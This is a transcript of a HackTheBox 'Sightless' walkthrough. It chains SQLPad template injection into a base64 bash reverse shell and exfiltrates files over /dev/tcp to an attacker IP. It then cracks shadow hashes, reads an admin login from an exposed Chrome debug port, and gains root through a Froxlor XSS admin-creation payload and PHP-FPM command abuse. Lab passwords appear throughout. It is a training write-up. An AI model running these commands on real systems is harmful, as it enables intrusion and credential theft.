HackTheBox - Sightless
Key Takeaways
Exploits an outdated SQLPad (6.10.0) via server-side template injection in the connection's database field to get remote code execution inside a Docker container, cracks the container's /etc/shadow hashes to SSH into the host as michael, then reaches root through Froxlor: either by reading the admin login from a headless Chrome with its remote-debugging port exposed (or the intended blind-XSS admin-creation payload), and finally either abusing Froxlor's PHP-FPM restart commands or resetting a customer's FTP password to pull a KeePass database holding root's SSH key.
Full Transcript
What's going on YouTube, this is IppSec and today we'll be doing Sightless from HackTheBox, which is a nice easy box. It starts off with finding an outdated version of SQLPad running which has several vulnerabilities. We'll play with the server-side request forgery, but really this just gets us recon information; it doesn't really do anything valuable. The key vulnerability is a template injection that leads to remote code execution and gives us a shell on a Docker container, where we find credentials that let us SSH into the host. From the host there are two paths to root. The intended way involves exploiting a cross-site scripting vulnerability in Froxlor, but to simulate this XSS there is a headless Chrome running with the debug port exposed, so we can skip the whole cross-site scripting by accessing the Chrome remote browser and then viewing the password they used to log in. Once we log in to Froxlor there are two paths as well: the first being exploiting Froxlor itself to get root, the other is changing the credentials of a user, which lets us access their home directory over FTP, and that contains a KeePass database which we can decrypt to get access to the root SSH key. So with that being said, let's just jump in.

As always, off with an nmap: -sC for default scripts, -sV to enumerate versions, -vv for double verbose (this gives us the TTL and things like that), -oA to output all formats, put it in the nmap directory and call it sightless, then the IP address of 10.10.11.32. This can take some time to run so I've already run it. Looking at the results we have three ports open. The first one being FTP on port 21, and we see it's the ProFTPD server. It's leaking the hostname of the box, which is sightless.htb, and every command it tries to run is getting "invalid command, try being more creative", so I don't know exactly what's going on here, but let's just move on. We have SSH on port 22; the banner tells us it's an Ubuntu server. And we also have HTTP on port 80; it's nginx, also running on Ubuntu, and redirecting us over to sightless.htb. So let's go ahead and add this to our hosts file: we'll do sudo vi /etc/hosts and then we can add 10.10.11.32 sightless.htb, save that, and now let's take a look at the page.

So we'll go to http://sightless.htb and we get "Hello, we are sightless.htb, how can we help you". The first thing I always like doing is just looking at the source code to see if anything sticks out, if it's running a CMS like WordPress or things like that. I don't see anything that really sticks out here. We can also look at the Wappalyzer plugin; it's not telling us any new information. So let's just go test index.html; that brings back this page. We can try an extension like .php, doesn't exist, so chances are this is a static page. We can try index as well and that also goes 404, so I'm guessing this is just a static web page. If we see it accepting user input then that'll change our mind a little bit later, but these are just the things I'm looking at now. I'm going through all the links: we have a mailto to sales@sightless.htb. I'm looking at SQLPad, we see sqlpad.sightless.htb, so let's go ahead and add this to our hosts file before we forget, so we can add sqlpad.sightless.htb, save that. We have Froxlor; looking at this link it just goes to froxlor.org, database and server management. Go to the "contact me" button and this just sends an email to sales@sightless.htb. So we don't really have too much to go off of. We could look at FTP or just take a look at SQLPad.

I'm going to connect over to SQLPad and see what this is about. Looking at the databases, we don't have any databases here. I was hoping maybe it was connected to a database and we could use something like a LOAD_FILE command and start reading files off the server. We can't do that. We can try select 1; this is a relatively safe database command, and maybe if it gives output then we can just start trying to execute commands on the box. Doesn't look like we can. If we go to new connection and look at the drivers, we do have SQLite, so we could maybe potentially do this, I'm not sure. Let's do tab, SQLite, test, save. Does this create the box or the database? It looks like it does, so we can create files on this box. So potentially, if this is a PHP app, maybe we could create a PHP file. I'm going to google "sqlpad github" and see what language this is. I'm guessing it's an open source web-based SQL editor. Let's see, what is this SQLPad, let's go over to server; I'm guessing this is going to be Node.js. Yeah, it's Node.js. So let's see what else we can do. We probably could do a server-side request forgery type of thing, so we're going to create something called ssrf; let's just do MySQL and see if we can make it make a connection over to us. So I'll do 10.10.14.8, which is my IP, and let's just connect on 9001, so I'm going to nc -lvnp 9001. We can test this connection and it does make one to us, so this is a server-side request forgery. We could also see connections running on localhost of the box, so let's test this out real quick. I'm just going to send this over to Burp, go into test, go into the Repeater tab, and then I'm going to do 127.0.0.1 and let's see, the port, let's do 22, and we get connection refused. This is telling me potentially that this is running in a Docker container or something like that. So I'm going to give it the IP address of 10.10.11.32 and we get "packet out of order", so it actually made its way over there, it's just not a MySQL connection. We do port 80, looks like it's hung, so I'm guessing maybe it can't get over to port 80 for whatever reason. I'm going to open a new tab, because when that connection that's hung in Burp comes back it rewrites what's in the request panel and becomes really annoying. So if we do 80, connection refused; 8080; 8000; another common port is 3000 or 5000, and 3000 hangs. So this means it can't connect back to it, which means this is probably the port the web server is running on.

If we didn't want to guess a bunch of ports, you could also send this over to ffuf. So if I copy this request to a file, I'm going to label it ssrf.request, then we can do ffuf -request, specify the file, -request-proto http, and a wordlist. I'm going to give it a wordlist of, let's just do 2990 to 3010, just so this doesn't take that long. Normally you'd do 1 through 65535 to test all the ports, but for this demo we want to keep it relatively quick. And I think that's all we need, right, because the port has FUZZ in it. So if I send it, it's going to hang, and it takes 10 seconds because that's what the timeout is, and it will just say one error and we won't get exactly what the data was. So we just want to get there; it's probably going to be another 3 to 4 seconds, and I'll show how to change ffuf so we can actually see this. Right, we have errors: 1. So the best way to do this is to use the match time. If I do ffuf -h, we can do, let's see, match, and we can say -mt for how many milliseconds to the first byte. And I know the help is out of date: "match how many milliseconds to the first response byte", and if there is no response byte at the end it's going to display it. So if we do -mt, I'm going to say 500 milliseconds, and we need, what is it, greater than 500 milliseconds I think. So we're waiting here; it's been greater than half a second, we don't have it outputting yet, but as soon as that 10 seconds hits it's going to display something and tell us. And the way I found this was I just went "github ffuf" and see if I can find it real quick. We have to get over to the GitHub page; I don't know why that Google query is not coming back. We're not connecting to the internet somehow... I bet Burp is set on intercept, that's what happened. Yeah. So looking here we can see "timeout while time match is active, FUZZ 3000", so it's timed out reaching port 3000, so that's how we know that is the active port. We could change this ffuf to be 1 through 65535 and we'll let this run while we look at the issues. So I did this and I searched "timeout", and let's see, "is there recursion, doesn't add job, few parameters", there we go. If I looked at this issue, when you're using ffuf -mt time it doesn't display anything, and then over here we just have the response saying it will display everything now at the end of the request, so that's a nice little change. We're only at like 6000 of 65000... there we go, it has timed out on port 3000. But this was a lot to do about nothing, really; finding out where it goes doesn't really help us, it's just good recon I like doing.

The one thing we missed was enumerating what version SQLPad is running. I go to About, we can see version 6.10.0, and it links us over to the changelog right away, which makes it easy to identify how old this is. So if I search this page for 6.10.0, we have 2022-03-13, so this is like 2 years old. So let's look for any type of exploit in SQLPad, so we can do "exploit sqlpad"; we could also look for CVEs, things like that. Template injection, so we can look at this. I'm guessing it's going to be the CVE from 2022. There is, looks like, an SSTI, and it looks like we just say add connection, MySQL, and input this into the database field. So let's go back over to our request, go into Repeater. Guessing the driver, we'll just intercept the request again and see exactly what it is. So we go manage connections, add connection, I'll call this ssti, driver it said MySQL, and then in the database, I think, right, is that what it told us to do? In the database form field, yep. So let's go, I'm sure this doesn't really matter. We want to intercept this, so turn Burp Suite on, proxy, intercept on. I think I accidentally killed it; see, sqlpad 10.10.11.32, okay, test, don't know what that is, here we go. So let's see, it's putting it in both fields and we actually won't be able to see anything in /tmp/pwned, right, we just get connection refused. Oh, because it's attempting to connect to this. Let's do something that actually connects back: let's do 10.10.14.8, let's do 9001, and then we'll do nc -lvnp, I'll do a -k before -p for keep alive, 9001. So this way we can send it and then we get a connection back. Awesome. I don't know if it actually has to connect; I figured if we're specifying a database we should let the process connect before we let it die, because if it can't connect it may not even attempt to connect to a database, right. So now we have an exec field; we want to get a reverse shell. So I'm going to go echo -n, we'll do bash -i >& /dev/tcp/10.10.14.8/9001 0>&1, like that, and let's base64 encode it. The reason why I'm not doing a bash -c beforehand is because in the cradle that we're about to type we're going to do bash, so we know we're executing bash is what I should say, so we can do echo, base64 -d, and then pipe this over to bash. And let's see, I don't want the -k when I'm doing a reverse shell; let's just do 9000. Okay, so the connection timed out and because it timed out it rewrote what was in my request field; I really, really hate when Burp does that, but let's just retype this out: base64 -d, pipe it over to bash. Connection refused, but we get a shell. Awesome. So the connection doesn't have to come back, so you could leave the host and port to be whatever you want; it'll always just execute what's in that database field.

And no surprise, we're in a Docker container. We already had known that because we did that server-side request forgery a couple minutes ago, and I say no surprise when I see a Docker container just because of the hostname of this box. I bet if I do ls -la on / we can see, there we go, the docker entrypoint. So I'm going to do which python3; we don't have it. Let's do which script; we have script installed, so we can do script -q /dev/null bash, or not pipe, but execute bash. Then I'll do Ctrl-Z, stty raw -echo, fg, enter, enter, and now we have things like tab autocomplete. I'm going to do bash here so we have the script; we can do export TERM=xterm so we can clear the screen. So let's see what we have here. We have sqlpad.sqlite, so I want to go and grab this database file. So let's do nc -lvnp 9001, cat sqlpad.sqlite to /dev/tcp/10.10.14.8/9001. I forgot to redirect this over to a file, so we'll do > sqlpad.sqlite. There we go. So we can now do sqlite3 sqlpad.sqlite .dump and dump all the data in here. So let's see, there should be inserts, right, there we go, we have two INSERT INTO users, so we have an admin and, looks like we have a null for john's password, I'm guessing, because we have admin, null, password hash, so this should be the password hash here. We have a potential password here, so let's see, did I copy that correctly? I need to fix that real quick; I copied that whole line break. So we have this; let's go ahead and go over to the Kraken, which is just another box where I have hashcat running. You can run it on your own machine, just don't do it in a VM; I'd recommend doing it on the host. So let's vi hashes, we'll call this sightless.sqlpad, paste this in, then hashcat, hashes, /opt/wordlist/rockyou.txt. It's going to go in auto-detect mode; it'll probably error out because we have to tell it we want mode 3200. There we go.

So while that runs, let's see what else we have on this. There we go, so I am running as root, and if we look at /etc/passwd we do have other users on this container: michael and node. I just say other users because that's 1000 and 1001 as the IDs. We cat /etc/shadow, we also have two hashes here. So after this, which it looks like it did crack, that password is just admin. So we should probably have some type of notes, so we'll do vi notes.txt, I'm going to call it actually creds.txt, and this will be SQLPad admin:admin. Okay, then let's go and grab these hashes. So I'm going to grep for $6, probably have to escape these dollar signs, there we go. Then we can do awk -F on a, can we do it on colon, I'm making sure there's no colons in the hash, looks like we can, and then print $2, there we go, so we just have the hashes. I always like doing usernames too, and my terminal is doing that weird line wrapping thing so we have to fix the TTY, so we do stty -a, rows 28 columns 110, so let's set that real quick: stty rows 28 columns 110. Okay, so we have that. Let's do a print $1 colon $2, so now we have username colon the password hash. This is the way I like storing hashes when I crack multiple, and then we can go over into hashcat, vi hashes/sightless.docker-shadow I guess, and we can paste this. hashcat docker-shadow, and we have to give it the user flag and that's going to tell it we have usernames in this; maybe it's --username. No hashes loaded, token length exception; I bet it's not 3200, let's see. Well, that cracked really fast, so what mode was that, 1800, and we have two matches here: we have blindside and insaneclownposse. It doesn't tell us the usernames here; we could just go back and look at our results, but since we have it in the file let's delete the wordlist and I can just do --show and hashcat's going to tell me root's password is blindside and michael's password is insaneclownposse. So let's go back into our notes and we'll say Docker root, blindside, and Docker michael, insaneclownposse. Okay, save that.

And we can try SSHing into the box. So I'm going to do ssh, I'm going to do michael first real quick, so we try michael@10.10.11.32, insaneclownposse, and we get logged in. So it looks like that lets us onto the box, so we can save this and say Sightless SSH, like that. There we go. And let's see what we have. Well, the first thing I always try when I'm root on a Docker container and low priv on the host is a privilege escalation we saw in the Intuition machine, and that is sharing a block device. So I'm going to do lsblk, and we see the block device I want is 253, so I'm going to run mknod /dev/, I'm going to call it rootfs, block device, 253 0, and we get operation not permitted. So the Docker capability is not there for us to exploit this, so I just forget about it. That is somewhat common, I've found, so it's just one of those things I just try really quickly. You can probably enumerate your Docker privileges to see if you have it, but I normally just run the command first because it doesn't take that long.

So let's see, we're michael on the box; let's go to a ps command, so I'm going to do ps -ef --forest and then less -S so we can see all the running processes. And looking at cron we have something interesting: every little over two minutes we're running this healthcheck command, and that does the sleep 60, this is almost 2 minutes, we're running some administration, it's running chromedriver on port 55521, and let's see, there's probably going to be a debug port, there we go, --remote-debugging-port=0. So we could stand up Chrome and access this browser potentially, and this is going to be an unintended route, but I'm going to show this first and then we're going to show the intended way, right. So let's go ahead and look at this. We want to do ss -lntp to see all the listening ports, and one of these is going to be the actual Chrome port. I think the port that is shown, let's see, I think 55521 is some type of redirection port, so I don't think that's the port we actually want; it's probably going to be something in the 40000 range, so probably this. Let's just try this first. So I'm going to do ~C as the first command, so enter, ~C, there we go. Let's forward port 41845 to 127.0.0.1:41845, and I always like using IP addresses, not localhost, because sometimes localhost goes to IPv6 and things get wonky, so it's always safest just to use the 127 address. So now that we have that I'm going to open up Chrome, let's do chromium, there we go, and then I want to, I think it's inspect, so we'll do chrome://inspect, there we go, Devices, Target, and we'll do 127.0.0.1 and then what is the port, 41845 is what we just forwarded, so we can put this, click Done, and there we go, we have Froxlor and it's pointed at admin.sightless.htb; it just went over to index.php. So we can go inspect and we can actually view what that browser is doing, and we have the Network tab up. If I go to, well, right here we don't see anything; it's going to log in and when it logs in we'll be able to see the payload that's sent. Right, there we go, we have login name admin, the password is ForlorfroxAdmin, and I did not get to copy that, so let's just wait for it to happen again. It should happen probably in 5 seconds and I'll press Ctrl-C so it actually gets copied this time. So there we go, it's typed it, copy that, paste, awesome. So let's go back over to our notes and we can say Froxlor, and that's admin, like that, save that.

And now we have to access this page, so this is going to admin.sightless.htb port 8080, so let's forward that to, let's try port 9000. I don't want to do 8080 because that's where Burp is listening, so I'm going to go SSH and do the ~C thing again, -L, 8080 nope, this is what we're listening on, we'll listen on port 9000 and go to 127.0.0.1:8080. That port is now forwarded, so if I go over to Firefox we try localhost and then 9000. I think Burp is set to intercept so we can turn that off. We get "domain is not configured". Remember they were going to admin.sightless.htb; I think the IP address also works, right... maybe not. So let's try changing the virtual host, so we can do, let's save that, sudo vi /etc/hosts, admin, I think it was admin.sightless.htb, I wish I actually paid closer attention, admin.sightless.htb. Oh, let's try 127.0.0.1 again, that does work, so what happened? Let's do it again real quick. I did localhost:9000, it redirected me to notice.html, and when I changed this I still hit notice.html, but if I went back to the root we get the Froxlor. So let's go to login, the username was admin and then the password we had saved, it's a weird "ForlorfroxAdmin", I think that's how you pronounce it, paste this in, and then we get logged in.

Now there's probably a few ways to get RCE from here. We just click around: System, Configuration, not that; go to Settings, we look at PHP settings, Perl settings, maybe FTP even. You can change, well, this is enable/disable PHP-FPM; we can change binaries, so chances are we could change the path to Perl to be a shell script and then execute that, right. FTP server, maybe we can edit the ProFTPD settings to change a binary name; there's a few ways. And the actual intended way isn't to RCE this web server at all; we'll go over that at the end of the video, but we're going to show the unintended way really quick. So I was noticing there's PHP-FPM versions and it allows us to restart PHP-FPM. We can create a new config, and I'm going to call this pwned, and this isn't the most stable, and maybe I don't know exactly how to exploit this the best way, so I'm going to do a silly thing and do chmod 4755 on /bin/bash. Now normally you'd want to copy bash somewhere else so you're not changing the default shell, but I haven't had the most luck with having this be stable enough to run multiple commands, so we just want to make sure we do it in one shot, right. And if we copied bash over to, let's say, /tmp, then the owner is now michael, so we have to change the owner to root, then we have to chmod to give it the setuid bit; it's just annoying, right. So we can see the permissions right now, what you'd expect, 755; we want to change it to 4755, so that's a setuid bit. So let's change this to dynamic on the process manager control, save these changes, and if we do stat again it has not changed. I think if we go to System, Configuration, oh no, Settings and then the PHP-FPM, we disable this, and now it runs the commands that are in the restart when we go to start it, I think. So let's start this back up, we do a stat again and it's still just 755, so that did not do it. If we go back to PHP-FPM versions, we see "configurations not in use", so let's change this Froxlor vhost config from system default to our config and then we can just save this. So we probably just destroyed this website; maybe we want to do web1, but let's just see what happens. So now we have the Froxlor vhost config, and I just realized the admin is going to be ourselves, so we may destroy our own box; we'll see what happens. We can always revert if something goes wrong. So PHP-FPM, look at it, it's still 755; disable it and then we're going to enable it again and let's see, it's still just 755. This is what I've been meaning: it's not the most stable. I've had times when it just works every time. Let's edit this; I wonder if we save it, does it run? There we go. I don't know what just happened; maybe you have to save it after it's running, but now we see bash is now marked setuid. We can do bash -p, id, and we are root.

So let's see real quick, maybe that was it, maybe I just had to click save. Let's do test, and I'm going to touch /dev/shm/pwn, we want to make sure this is dynamic, save, and weird error. So I don't know exactly how to come back from this other than reverting the box. I think it only affects the FPM daemon so we're probably good. It's probably because we changed that site, right. Let's go Settings, Configuration, where was it, PHP configs, maybe it's this, you can set that back to default and restart it, see if that fixes it, but if not then we'll just move on and do the intended way. So let's go Configuration, nope, Settings, PHP-FPM down, let's hope this restores that, up, PHP-FPM versions, create new, test, let's do touch, yep, dynamic, save, and yeah, we got some weird error message. So I think we're kind of stuck on getting code execution that way, but we already did, so if you wanted to you can get it this way.

But let's take a few steps back and we're going to do the box the intended way. So let's log out of this Froxlor, log out, because we don't need any of that to do the box. Well, you actually log in through FTP, but in order to get the actual credential for this we weren't supposed to use the Chrome debug thing; we're actually supposed to use a CVE. So if we looked at Froxlor exploits, there is a cross-site scripting vulnerability somewhere; let's see, blind XSS in the advisories, and they have a payload here. So let's grab this, we'll save it and then copy it to a directory and then look at exactly how this works. So copy Downloads payload here, look at it, it's all URL encoded, let's cat it out and we will use Burp to, I guess, decode it and see exactly what this looks like. So vi decoded.txt, paste it, and now we want to search for all semicolons and replace them with a return character, and let's see, we probably want to clean up the pluses and make them spaces, so do %s again, plus, space, g. There we go. So this is going to be what the payload does. The first line and the last line is just JavaScript, so we enter the cross-site scripting and then execute this code, and all this is a simple cross-site request forgery payload that will send a POST request right here over to demo.froxlor.org/admin_admins.php with this payload. So we're just creating a new admin, essentially, and we're hijacking the session of the user, right. So we're going to have to modify this because our box is not at demo.froxlor.org. Now we could be really lazy; we don't need to put the domain there, we could just make the payload this and then the browser is going to use whatever page it's on, and that's probably going to be what we do. But if you wanted to know the actual page, there were a few hints that would lead you down the path to get it, right. The first one is if we went back to the ps --forest command and looked at all the processes, there's both nginx and Apache running, which is pretty odd, right; you kind of want to look into the Apache config if you see that. If we go all the way back to the nmap, the nmap just told us nginx because we didn't have port 8080 listening, so we couldn't see 8080 was actually Apache, so that alone is enough for you to go dig into Apache. But also if we go back to Burp and intercept a request to Froxlor, so we send this, go over to the Repeater pane, we can see if we looked at this, where is the server, I swear it says it somewhere, oh there we go, right at the top, Apache 2.4.52 Ubuntu. Right, so there are hints that we should look at Apache, and if we look at Apache we can go cat /etc/apache2/sites-enabled, and then we have a few. We could look at the froxlor ipandport and this is ServerName admin.sightless.htb, so this is where the user is at. So we'd probably just replace the URL with admin.sightless.htb and it's probably going to be on port 8080. Let's see, /etc/apache2, grep -R 8080, is Apache listening, yeah, we're listening on 127.0.0.1:8080. But that is how you get the domain admin.sightless.htb if you wanted to put that in the payload, but I would recommend just not putting a domain and having it be like this, because when you put the domain, I think it's actually putting GET and then the full domain here. I wonder if that works; let's do 127.0.0.1:9000/index.php, no, bad request; we specify http, yeah, oddly enough this is a valid HTTP request. I don't know if it's valid by RFC standard, but when you put the full URL in I think that's what you're doing. I don't know if it's handling it programmatically or it's just doing it like that, so I'd recommend just removing that. So let's go back to payload.txt and where we have https I'm going to delete this, I'm going to delete demo.froxlor.org, and there we go, this should be your payload. So if I cat payload.txt we can now copy this, and then if we go back to the blind XSS it's telling us to provide an invalid username to the login. So let's intercept another request, we can forward this, log in, we will put this in Repeater and then we want to put our payload in the login name, because there's a page in Froxlor that will show you all the users that failed to log in and for some reason this template will just execute JavaScript in the user's browser. I don't fully understand what's going on here, but that's what this piece is doing. So this is like the template injection on the login, like the table of failed logins, and then this is the JavaScript that we're running. So if we send this request it'll probably take a minute or two for the admin to hit the page, but when they do it's going to add that account of, what was it, abcd, so add abcd and then I think that's like abcd, maybe 1234. Let's just go back to the page to get it.

So we'll try logging in with abcd like that and the password abcd, yes it is, at at, hopefully it works, paste this. Let's turn Burp Suite off. Probably going to erase that because we had a failed login pending. Log in, and it did not log us in. Looking at the password, abcd1234, that is not working. I wonder if we need to do admin. If this doesn't work in a minute I'll just put the full URL; I wonder if there's something wonky with the automation that it needs the full URL, because I think it should just work with this payload. Let's copy payload to payload2.txt real quick, vi payload2, and I'm going to put the whole thing, so this was http://admin.sightless.htb:8080, cat payload2.txt, and just before we do this let's try it one more time, abcd like that, okay, that's definitely not logging in. Let's grab payload2, copy, and we will paste this, admin.sightless.htb, I think that's fine, the abcd. I wonder if it's a cap, nope, new login name lowercase, admin password, there's a capital A. I closed the tab, but I swear Froxlor... there, like an undo, reopen closed tab, awesome. Admin password, yeah, it's a capital A. Was that the issue? Oh shoot, Abcd, capital A, we get logged in. So I want to see if my other payload worked; I can show exactly what's going on real quick. So if we go to System, System log, we can see these are the users, and our Froxlor application has been hacked because we have this unknown user right here, and for some reason that triggered it, right. So let's log out real quick; I'm going to log in with admin so we can delete this user, because I don't think you can delete yourself, but we should be able to delete this user. So let's do cat and we'll just create a new user, actually let's do payload.txt, we already have that in our Burp Suite window, no we don't, copy this, we will paste this and then where is, here it is, new login name equals, we'll do ippsec, and then that will be the password. So we'll send this, and then if I log in again, cat creds, I'm guessing by the time I do this the cross-site scripting already hits and it created ippsec. We go to Resources, Admins, yeah, I do exist. So that was the issue: the password here is actually a capital A. Let me download this and make sure that I did not screw that up. We'll replace that, sure, open payload, and admin password equals %3D, yep, capital Abcd. Wow, so if you're copying it from this page the payload is slightly different.

So now I guess let's do the next step. At this point we're just supposed to be one of the users we created; it doesn't matter, I guess I could log in with ippsec and then the password abcd1234. There we go. So the intended way is not to get RCE on this, but instead we look at Traffic, and we do 2024, we can see there's FTP traffic to the user web1, so we want to look at what files are in web1, which is john. So let's go and change john's password so we can FTP in. Let's go, not Customer, index, oh, when I click that it made me impersonate web1, which was weird, but okay. So we can go here, Users, we can edit, and then password, I'm going to change the password to Please Subscribe; actually let's put that on a clipboard and type it like that, okay, paste and save. So now we have a password for web1, so we should be able to FTP to the box. So if we do ftp 10.10.11.32 we get connected, and then if we wait probably 20 to 30 seconds it will then prompt us for the username. I'm guessing what happened here is it's doing a reverse DNS lookup and it just times out or something like that. So if we specify the username of web1 it tells us SSL/TLS is required, so I'm going to switch to a different binary, lftp, because this one is going to support the protocol, right. So if I do dir, I probably have to specify the username, right; let's do lftp web1@ like this, specify the password Please Subscribe, and then we can do dir and it's going to probably fail. "ssl and lftp", let's see, lftp disable SSL; it's probably got to add verification as well, it's like set ssl:verify no, I think, let's see, ssl:verify-certificate false, so set ssl:verify-certificate false. There we go. So now I do dir and it's going to do the FEAT negotiation, whatever that means, and it should come back: login failed. So it did not work with the login. Let's go back to the website and see if the user works. So I'm going to go new private window and we'll do 127.0.0.1:9000, log in, web1, password of Please Subscribe, log in again, the password does work. Do a dir again and let's see if it passes this time. I think there's some weird thing where the password gets set when you actually log into the Froxlor admin panel, so even though we changed the password, web1, nope, that did not work there. Let's go lftp; that's why I prefer the password, okay, hopefully this time it works, 10.10.11.32, that should be the right IP. Else, logging in, login incorrect, okay, we must be doing something wrong. So let's go back here and let's see, if we go to the options, we set the password here. I wonder if there's a separate password for FTP, like this is the web password, but I wonder if there's a way to set just FTP. We click web1, we will impersonate them, go to the FTP accounts, this must be it, let's set a password, clipboard still says Please Subscribe, click save, there we go. Now, moment of truth, does this finally work? It's attempting the negotiation; I wish it didn't take so long to do this, but hopefully after TLS we send, there we go, that's it. So make sure when you set the password to set it on the FTP, right. So if we go look at, go access, we do a dir, there is a backup directory. We can look at this and there's a KeePass database, so we can do a get database.kdb, save that.

And then let's see, it should be right here, and if we do kpcli -h, is it like, what is the argument, --kdb, and then specify the database. We need the master password; I just tried "password" and it does not work, so there's probably a keepass2john. Database, there we go, so let's copy this and we'll go back over to hashcat and try to crack it, and that is a long hash, holy cow. Okay, where is, there we go, nope, I think I'm out of hashcat, so let's just ssh kraken, cd hashcat, vi hashes/keepass and then we will paste that hash, and then hashcat this, /opt/wordlist/rockyou, and see if it auto-detects this. Specify the hash mode; it's either one of these, KeePass 1 and KeePass 2. I'm going to do 13400 because I don't know what keyfile-only mode is. It looks like this is enough to get it started, and are we starting yet, looks like we are. Look at the time, how long is this going to take, says 43 minutes; hopefully it doesn't take that long, it should only take, there we go. I was about to say normally it's near the top of rockyou if a Kraken challenge is there, and the password is bulldogs. So let's go ahead and open that, so kpcli, always, we get it, --kdb database, bulldogs, and we get logged in. So I'm going to do a find . and that's going to find all the things, and we can see there is ssh, root, and then pass. So I'm going to do a show ssh and we can add a -f to show the password and we have root's password here. So let's do a su and see if we can authenticate; does not look like we can. So there is an attachment, which is id_rsa; I'm going to do attach this and let's export it, and we'll export to /home/ippsec/id_rsa, that's fine, and we finish. So I'm going to copy id_rsa over here, let's see the permissions, chmod 600, then we can do ssh -i id_rsa root@10.10.11.32 and we get invalid format. So let's look at the file; it looks like it's an SSH key. I think they're supposed to end with a line break; still invalid format. Let's see the encoding, and whenever you see the dots in an SSH key it's
probably because it's terminated with 0 d0 a and it only wants 0 a and the quickest way to fix this is Dos to Unix so now let's xxd it we can see it's just 0 a so let's use this key again and there we go we get logged in so that is going to be the Box hope you guys enjoyed it take care and I will see you all next time
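The "invalid format" error at the end of the transcript comes from CRLF (0d0a) line endings in the exported key, which dos2unix strips. As an added example that is not from the video, this Python block diagnoses that condition and performs the equivalent normalization on a constructed placeholder key (the body is filler text, not real key material).

```python
"""Diagnose and repair CRLF line endings in an exported OpenSSH key file.

Added example, not from IppSec's video. OpenSSH rejects a private key whose
lines end in 0d0a; the transcript fixes this with dos2unix, then confirms
with xxd that the file ends in a lone 0a. The key below is a constructed
placeholder with a nonsense base64 body, not a real private key.
"""

HEADER = b"-----BEGIN OPENSSH PRIVATE KEY-----"
FOOTER = b"-----END OPENSSH PRIVATE KEY-----"

# Constructed sample: a key file as it would look after a CRLF transfer.
CONSTRUCTED_CRLF_KEY = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----\r\n"
    b"QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5\r\n"
    b"ejAxMjM0NTY3ODkgcGxhY2Vob2xkZXIgbm90IGEga2V5\r\n"
    b"-----END OPENSSH PRIVATE KEY-----\r\n"
)


def diagnose_key(data: bytes) -> dict:
    """Report the framing and line-ending problems that make ssh reject a key."""
    return {
        "has_crlf": b"\r\n" in data,
        "has_bare_cr": b"\r" in data.replace(b"\r\n", b""),
        "ends_with_newline": data.endswith(b"\n"),
        "has_header": data.lstrip().startswith(HEADER),
        "has_footer": data.rstrip().endswith(FOOTER),
    }


def normalize_key(data: bytes) -> bytes:
    """dos2unix equivalent for a key file: drop a UTF-8 BOM, turn CRLF and bare
    CR into LF, strip trailing spaces/blank lines, end with exactly one LF."""
    if data.startswith(b"\xef\xbb\xbf"):
        data = data[3:]
    data = data.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    lines = [line.rstrip(b" \t") for line in data.split(b"\n")]
    return b"\n".join(line for line in lines if line) + b"\n"


def tail_hex(data: bytes, n: int) -> str:
    """Hex of the last n bytes, the way you'd eyeball the tail of xxd output."""
    return data[-n:].hex(" ")


if __name__ == "__main__":
    print("before:", diagnose_key(CONSTRUCTED_CRLF_KEY), tail_hex(CONSTRUCTED_CRLF_KEY, 2))
    fixed = normalize_key(CONSTRUCTED_CRLF_KEY)
    print("after: ", diagnose_key(fixed), tail_hex(fixed, 1))
```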
Original Description
00:00 - Introduction
01:00 - Start of nmap
03:30 - Discovering SQLPad
06:20 - Discovering an SSRF in SQLPad when adding connections. Sending to FFUF, use a time filter to show timeouts
10:01 - Finding the SQLPad Version (6.10.0), which has a template injection vulnerability getting a shell
14:25 - Shell returned, extracting the SQLPad database
17:45 - Cracking the shadow file of the docker container to get Michael's password
21:05 - Shell as Michael, discovering headless chrome is running forwarding ports to access it
26:55 - Logging into froxlor, getting RCE as root by changing PHP-FPM Configuration
32:40 - Doing the box the intended way, getting Froxlor Cookie via XSS
44:30 - Changing the Web1 user's password so we can FTP into the box
49:00 - Cracking the Keepass database to get root ssh key